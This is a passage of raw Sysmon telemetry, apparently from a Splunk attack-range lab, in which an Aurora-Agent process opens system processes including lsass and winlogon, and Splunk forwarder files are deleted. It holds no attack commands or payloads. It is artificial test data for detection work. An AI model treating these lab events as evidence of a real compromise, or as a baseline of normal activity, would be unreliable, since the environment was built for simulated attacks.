Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015097Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.672{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015096Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.663{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015095Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.652{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015094Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.641{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015093Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.597{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015092Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.588{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015091Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.581{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015090Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.570{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015089Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.560{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015088Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.552{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015087Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.543{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015086Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.539{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 23542300x800000000000000015085Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.373{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A64E18057F2F44853E4C4A5FD0CE0900,SHA256=31D036074A83E85ADA061E51B3614C01A9450F5844ADB5D7BC096465D07C6AB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015119Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:03.951{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015118Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:03.701{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49D1C1340B5CB08C7982EB40B7FC8175,SHA256=286D53C6A8FB059EF3C273125D638DB668AC39F8096A20AE08D58CF7C427B793,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000039814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:17:03.634{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXEHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFFBinary Data 23542300x800000000000000039813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:03.568{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BABED665C643A44EC461DF128DE0166,SHA256=C3DADB8797D9007F5C52B90F06143272EF67AF67E0DAA37E9A98E82B8E2A7F1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000039812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.899{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56223-false108.156.184.126server-108-156-184-126.cmh68.r.cloudfront.net80http 354300x800000000000000039811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.798{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56222-false108.156.184.126server-108-156-184-126.cmh68.r.cloudfront.net443https 22542200x800000000000000039810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.808{FE4C2B44-E326-63C7-F905-00000000AF02}3260ad.foxitsoftware.com0type: 5 d3p6bpyaguxd3a.cloudfront.net;::ffff:108.156.184.126;::ffff:108.156.184.54;::ffff:108.156.184.78;::ffff:108.156.184.105;C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe 23542300x800000000000000015120Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:04.992{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D28A4F18A69692F26948C79671E46D6,SHA256=6940C05E53E39FEC6AA0C804C79CD1E0ACB1B87CAC9E2115B940EE854D56145B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000039817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:04.878{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:04.626{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3284BC6935A63B6531C15860AE1D2125,SHA256=F40C17FB511D18DEDCA8802045074E9A1C338592430CAFAEFBB53C122AB2C417,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000039815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:02.651{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56224-false10.0.1.12-8000- 23542300x800000000000000039819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:05.709{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=325BF570CAD2C19627AA9EE86E53DD5A,SHA256=5BB66EA7CAA0A968BFC62F7A9DAC8E734D1A2289AB14BE364A8A97B899649324,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015121Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:03.815{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50037-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 354300x800000000000000039818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:02.902{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local51264- 23542300x800000000000000039820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:06.778{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A042C2BAD150D48AAABA64B41E3D4B12,SHA256=CD3B979493B83503D186811D5CF4F40B3BA2322A20DB874F46FB5413D204E8D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015123Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:03.910{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50038-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015122Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:06.083{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69033AE79DB51F53610CF7DF9FE7A205,SHA256=C6549623FB2A64808846454567D268EC6C6F1D02797DF2F06C7BD56AE4860C91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:07.858{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3FE78951806FA86F6A7D05C1297CD87,SHA256=71B7F25BD221C3195120E0A61749D326C94E7FF370E36363120B305827E67DC8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015124Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:07.173{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5FFE98038EFC7B1D086D7E4799005FF,SHA256=0142E641F889711D6602A826F0BF84E1EF5AA101D609698A8BFCDEFB20FC8316,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:08.953{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8A1C9A9C9BC0DC96D660D54ED2BB363,SHA256=F8F82CDB15F2E1496E1E66C95E290B7DA7F2F2DD945B742C62965ABE7FD223CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015125Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:08.266{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E6F39EDED31F95CE551C899CEB0BB7E,SHA256=6D9A6A12896C2759552DEA4E1B2A88A47987A1C956B6FBE9FEE3B827298C6687,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015126Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:09.349{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D5A915FC1188C1EF06FBA6D6A9468CE,SHA256=77E7A8021854878A1C8DCF57F6FBB5C0E322B12B857795DC99A87292CDB1B0D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015127Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:10.437{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C0D0272872E4510F421BF4ADC8DC607,SHA256=8E04E80163C166E950DD6CD63DFE80B324F8D7416638CBC7D1500733276590A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000039824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:08.638{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56225-false10.0.1.12-8000- 23542300x800000000000000039823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:10.021{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE7D910B94DF1D0FAD2239003CE7668F,SHA256=A9D7651CCB1106E0B8F76B23408396443B544CFEB9AE60C96475A2ADB898FF99,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015129Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:11.513{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8043F04902BBE54544682C37CC7F7DB,SHA256=7B768C59C9A631D8EEDEF3DEB5FB2E09FDC9391505E0BEEE8EA84AE0D103E527,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015128Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:08.919{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50039-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000039850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.897{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000039848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.889{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296NT 